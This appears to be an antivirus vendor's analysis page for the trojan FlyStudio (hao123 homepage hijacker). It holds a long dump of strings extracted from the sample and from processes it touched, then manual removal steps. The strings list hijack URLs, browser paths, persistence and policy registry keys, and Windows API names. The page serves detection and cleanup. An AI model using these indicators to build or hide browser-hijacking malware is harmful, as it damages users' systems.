2Beijing baidu Netcom science and technology co.ltd1>0<

2Beijing baidu Netcom science and technology co.ltd0

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

hXXps://VVV.verisign.com/cps0*

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

\2345Soft\2345Explorer\2345Explorer.exe

hXXp://VVV.2345.com/?k5209809

\Tencent\QQBrowser\QQBrowser.exe

\liebao\liebao.exe

360se6\Application\360se.exe

hXXp://hao.360.cn/?src=lm&ls=n29ef8d0697

\Local Settings\Application Data\360Chrome\Chrome\Application\360chrome.exe

\Local Settings\Application Data\360Chrome\Chrome\Application\

anonymous@123.com

.exe|.rar|.zip|.gif|.jpg|.mp3|.rm

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

user32.dll

iphlpapi.dll

MPR.dll

VERSION.dll

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

[%s:%d]

Range: bytes=%s-

[%s:%d]

PASS %s

PASS ******

USER %s

E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp

SIZE %s

PORT

User-Agent: %s

Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Referer: %s

Host: %s

GET %s HTTP/1.1

HTTP/1.1

hXXp://

Cookie: %s

%d, %s

\\192.168.0.129\TCP\1037

NSPlayer/9.0.0.2980; {%s}; Host: %s

rmff_fix_header: assuming data.size=%i

rmff_fix_header: assuming data.num_packets=%i

rmff_fix_header: assuming prop.num_packets=%i

rmff_fix_header: setting prop.data_offset from %i to %i

rmff_fix_header: correcting prop.num_streams from %i to %i

rmff_fix_header: correcting prop.size from %i to %i

%s %s %s

Session: %s

Cseq: %u

%*s %s

%*s %u

CSeq: %u

rtsp://%s:%i

rtsp://%s:%i/%s

ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586

GUID: 00000000-0000-0000-0000-000000000000

[%s:%d]

User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)

Range: npt=%s-

%s/streamid=1

%s/streamid=0

Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play

If-Match: %s

RealChallenge2: %s, sd=%s

Title: %s

Copyright: %s

Author: %s

real: Content-length for description too big (> %uMB)!

Require: com.real.retain-entity-for-setup

SupportsMaximumASMBandwidth: 1

Bandwidth: %u

Challenge1: %s

hash output: %x %x %x %x

hash input: %x %x %x %x

stream=%u;rule=%u,

Illegal character '%c' in input.

%s,%d

%s.lnk

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

GetWindowsDirectoryA

WinExec

RegCreateKeyA

RegOpenKeyExA

RegCreateKeyExA

GetViewportOrgEx

ShellExecuteA

SetWindowsHookExA

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

ntdll.dll

%s%s.dll

@%s (%s:%d)

%s (%s:%d)

accKeyboardShortcut

@comctl32.dll

@comdlg32.dll

mfcm80u.dll

MSWHEEL_ROLLMSG

Chttp\shell\open\command

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

\Internet Explorer\iexplore.exe

config.ini

\hao123.lnk

\config.ini

\hao123.exe

\uninstall.exe

Software\Microsoft\Windows\CurrentVersion\Uninstall

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

#Unable to load mail system support.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

1.0.0.0

Hao123.exe

VVV.xxm4com. All rights reserved.

1.6.4.10

(*.*)

SearchFilterHost.exe_1948:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

<requestedExecutionLevel

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<ERR> 0xx=

<LOC> %S(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

</MSG></TRC>

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610

iexplore.exe_3800:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_944:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

SearchProtocolHost.exe_2840:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

</MSG></TRC>

<MSG>

<ERR> 0xx=

<LOC> %s(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<LOC> %S(%d) </LOC>

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

hao123.exe:3776
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\hao123\config.ini (36 bytes)
C:\Users\"%CurrentUserName%"\Desktop\hao123Ã‚ÂµÃ‚Â¼Ã‚ÂºÃ‚Â½.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\hao123\hao123.exe (1561 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.FlyStudio_ad79dc900c

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.FlyStudio_ad79dc900c

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet